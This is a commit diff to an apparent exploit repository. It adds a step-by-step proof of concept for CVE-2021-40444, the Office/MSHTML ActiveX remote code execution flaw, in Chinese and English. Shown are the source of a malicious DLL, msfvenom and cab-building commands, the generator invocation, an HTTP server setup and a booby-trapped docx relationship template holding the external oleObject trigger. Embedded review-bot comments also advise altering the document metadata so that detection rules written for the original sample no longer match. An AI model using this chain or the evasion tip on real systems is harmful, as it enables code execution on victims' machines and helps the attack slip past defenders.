Add IE RCE Vulnerability:sweet_potato:
Ascotbe committed Sep 11, 2021
1 parent c74a613 commit 5b6a33a
Showing 26 changed files with 1,123 additions and 253 deletions.
2 changes: 1 addition & 1 deletion CVE-2018-8453/README.md
@@ -40,7 +40,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8453

测试系统Windows 10 1709 x64

![CVE-2018-8453](https://github.com/Ascotbe/Random-img/raw/master/WindowsKernelExploits/CVE-2018-8453_win10_1709_x64.gif)
![CVE-2018-8453](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2018-8453_win10_1709_x64.gif)

#### 分析文章
- https://github.com/thepwnrip/leHACK-Analysis-of-CVE-2018-8453
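Review bot: the replacement image URL on the added line switches to the `raw.github.com` host, which is a legacy alias that only redirects to `raw.githubusercontent.com`; pointing the README at `https://raw.githubusercontent.com/Ascotbe/Random-img/master/Kernelhub/CVE-2018-8453_win10_1709_x64.gif` avoids the extra hop and the dependency on the alias staying alive. Every image link added elsewhere in this commit (the CVE-2021-40444 README screenshots and GIF) uses the same alias and would benefit from the same change.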
124 changes: 124 additions & 0 deletions CVE-2021-40444/README.md
@@ -0,0 +1,124 @@
### CVE-2021-40444

#### 描述

这个漏洞是IE浏览器的漏洞,但是offer相关组件默认使用的是IE浏览器,所以在offer相关组件禁用了ActiveX也一样可以执行

#### 影响版本

| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | -------- |
| Windows 10 | x86/x64 | | | |
| Windows 10 | x86/x64 | 1607 | | |
| Windows 10 | x86/x64/AMD64 | 1809 | | |
| Windows 10 | x86/x64/AMD64 | 1909 | | |
| Windows 10 | x86/x64/AMD64 | 2004 | | ✔ |
| Windows 10 | x86/x64/AMD64 | 20H2 | | |
| Windows 10 | x86/x64/AMD64 | 21H1 | | |
| Windows 7 | x86/x64 | | SP1 | |
| Windows 8.1 | x86/x64 | | | |
| Windows Rt 8.1 | | | | |
| Windows Server 2008 | x86/x64 | | SP2 | |
| Windows Server 2008 | x64 | R2 | SP1 | |
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Server 2016 | | | | |
| Windows Server 2019 | | | | |
| Windows Server 2022 | | | | |
| Windows Server | | 2004 | | |
| Windows Server | | 20H2 | | |



#### 修复补丁

```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36934
```

#### 利用原理

根据之前在野利用样本`938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52`可以知道,其实就是利用默认浏览器(IE)加载ActiveX

![image-20210911112944428](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_1.png)

本质上恶意利用只需要修改样本中的`document.xml.rels`文件中框起来mhtml和x-usc这两段内容该为恶意目标网页,即可达到利用

#### 利用方式

首先需要生成一个恶意的DLL文件,通过msf或者自己编译都行

- 自己编译

```c
//calc.c
#include <windows.h>

void exec(void) {
system("cmd /c calc");
return;
}

BOOL WINAPI DllMain(
HINSTANCE hinstDLL,
DWORD fdwReason,
LPVOID lpReserved )
{
switch( fdwReason )
{
case DLL_PROCESS_ATTACH:
exec();
break;

case DLL_THREAD_ATTACH:
break;

case DLL_THREAD_DETACH:
break;

case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
```
然后运行命令
```
i686-w64-mingw32-gcc -shared calc.c -o calc.dll
```
- 通过msf编译
```
msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -f dll>>calc.dll
```
> 最好使用MSF生成DLL文件!
>
> 还有请看准对应机器,有些Windows 10 版本不存在该问题
安装环境所需要的依赖`sudo apt-get install lcab`,生成 cab用的
接着使用一键化脚本,`test/calc.dll`这个为你生成的哪个dll所在的绝对路径,`http://you_ip`你启动exp这台机器的IP
```
cd CVE-2021-40444 ; python3 exploit.py generate test/calc.dll http://you_ip
```
![image-20210911115757383](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_2.png)
然后启动http服务
```
cd srv ; python3 -m http.server 80
```
接着把生成的恶意docx文件(在`out/`文件夹中),放到目标机器上(Windows 10 2004 x64),即可执行成功
![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_3.gif)
#### 参考项目
- [prcabral](https://github.com/prcabral/CVE-2021-40444)
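Review bot: the 修复补丁 (patch) section links to the MSRC advisory for CVE-2021-36934, which is a different vulnerability; for this README the link should be the CVE-2021-40444 entry on the same portal path (`.../security-guidance/advisory/CVE-2021-40444`). Two smaller points in the same hunk: the 描述 paragraph writes "offer" where it means Office (the sentence is saying that because Office components render through the IE engine by default, disabling ActiveX in Office alone does not prevent execution), and the 影响版本 table marks only Windows 10 2004 as tested while the note after the msfvenom command warns that "some Windows 10 versions do not have this problem" without naming them; the table and the warning should be reconciled, for example by listing the builds that were tried and did not trigger.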
77 changes: 77 additions & 0 deletions CVE-2021-40444/REPRODUCE.md
@@ -0,0 +1,77 @@
# CVE-2021-40444

Reproduce steps for CVE-2021-40444

These reproduction steps are based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file).

## Generating docx

Go to `maldoc/word/_rels/document.xml.rels` and edit the two ocurrences for `http://<HOST>` with the URL to the exploit.html Eg.: `http://127.0.0.1/exploit.html` file.

Generate docx:

`cd maldoc/ ; zip -r maldoc.docx *`

## Generating malicious cab

```
#include <windows.h>
void exec(void) {
system("C:\\Windows\\System32\\calc.exe");
return;
}
BOOL WINAPI DllMain(
HINSTANCE hinstDLL,
DWORD fdwReason,
LPVOID lpReserved )
{
switch( fdwReason )
{
case DLL_PROCESS_ATTACH:
exec();
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
```

Exec:

`i686-w64-mingw32-gcc -shared calc.c -o calc.dll`

Generate cab (install lcab `sudo apt-get install lcab`)

`cp calc.dll championship.inf ; mkdir gen/ ; cd gen/ ; lcab '../championship.inf' out.cab`

Copy out.cab into `www/` directory, modify exploit.html to point to `http://127.0.0.1/out.cab`

Execute Python script: `patch_cab.py`

Finally, setup server:

`cd www/ ; sudo python3 -m http.server 80`

# End

Execute now maldoc.docx in target VM

If not working, make sure there is a `championship.inf` file at `C:\Users\<user>\AppData\Temp\`

If file is present but DLL did not get executed, make sure you are opening docx from a folder reached from by exploit.html, like Documents, Desktop, or Downloads.

# More

To automatically resolve the array obfuscation on HTML file use `deobfuscate.py` (already has hardcoded the mutated array)

Anyway, there is already a deobfuscated version: `deob.html`
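Review bot: the troubleshooting path `C:\Users\<user>\AppData\Temp\` does not exist on a default Windows install; the per-user temp directory the check is aiming at is `C:\Users\<user>\AppData\Local\Temp\` (`%TEMP%`), so the "make sure there is a `championship.inf` file" step should point there or readers will conclude the drop failed when it did not. Related: `cp calc.dll championship.inf` is load-bearing, since that exact filename is what the later check looks for, and deserves a one-line comment saying the DLL must keep that name; `mkdir gen/` should be `mkdir -p gen/` so a second run does not abort on the existing directory; and the sentence "from a folder reached from by exploit.html" has a stray word and should read "from a folder reached by exploit.html, like Documents, Desktop, or Downloads".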
2 changes: 2 additions & 0 deletions CVE-2021-40444/data/word_dat/[Content_Types].xml
@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="jpeg" ContentType="image/jpeg"/><Default Extension="wmf" ContentType="image/x-wmf"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>
2 changes: 2 additions & 0 deletions CVE-2021-40444/data/word_dat/_rels/.rels
@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>
2 changes: 2 additions & 0 deletions CVE-2021-40444/data/word_dat/docProps/app.xml
@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>Normal</Template><TotalTime>34</TotalTime><Pages>1</Pages><Words>206</Words><Characters>1176</Characters><Application>Microsoft Office Word</Application><DocSecurity>0</DocSecurity><Lines>9</Lines><Paragraphs>2</Paragraphs><ScaleCrop>false</ScaleCrop><Company>Consumers Association</Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>1380</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>16.0000</AppVersion></Properties>
2 changes: 2 additions & 0 deletions CVE-2021-40444/data/word_dat/docProps/core.xml
@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:title></dc:title><dc:subject></dc:subject><dc:creator>Microsoft</dc:creator><dc:description></dc:description><cp:lastModifiedBy>user</cp:lastModifiedBy><cp:revision>6</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2013-10-31T15:25:00Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-31T16:47:00Z</dcterms:modified><dc:language>en-US</dc:language></cp:coreProperties>
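Review bot: the document metadata committed in `docProps/core.xml` and in `docProps/app.xml` in the hunk above is static and evidently inherited from the in-the-wild sample the README says this was derived from rather than generated per run: `<dc:creator>Microsoft</dc:creator>`, `<cp:lastModifiedBy>user</cp:lastModifiedBy>`, `<cp:revision>6</cp:revision>`, created `2013-10-31T15:25:00Z`, modified `2021-08-31T16:47:00Z`, `<Company>Consumers Association</Company>`, `<TotalTime>34</TotalTime>`, word and character counts. Every docx produced by `exploit.py generate` will therefore carry identical properties, which is exactly the kind of constant that detection rules written against the original sample can key on. Either have the generator rewrite these fields (at least the timestamps and creator) or state in the README that the output inherits the sample's metadata, so testers know why a freshly built document is recognised.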
2 changes: 2 additions & 0 deletions CVE-2021-40444/data/word_dat/word/_rels/document.xml.rels
@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:<EXPLOIT_HOST_HERE>!x-usc:<EXPLOIT_HOST_HERE>" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/></Relationships>
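Review bot: the placeholder in the `rId6` oleObject target, `mhtml:<EXPLOIT_HOST_HERE>!x-usc:<EXPLOIT_HOST_HERE>`, does not match what REPRODUCE.md tells the reader to edit: that file says to replace two occurrences of `http://<HOST>` in `maldoc/word/_rels/document.xml.rels` and then `zip -r maldoc.docx *`, whereas this commit stores the template at `data/word_dat/word/_rels/document.xml.rels`, uses `<EXPLOIT_HOST_HERE>`, and fills it from `exploit.py generate`. Either update REPRODUCE.md to the layout actually committed or label it as the upstream prcabral document kept for reference. Since the README itself identifies the `mhtml:` and `x-usc:` segments of this relationship as the only thing that needs changing to weaponise the sample, a short comment next to this file (or in the README) noting that the `TargetMode="External"` oleObject relationship is the trigger would help analysts find the relevant line quickly.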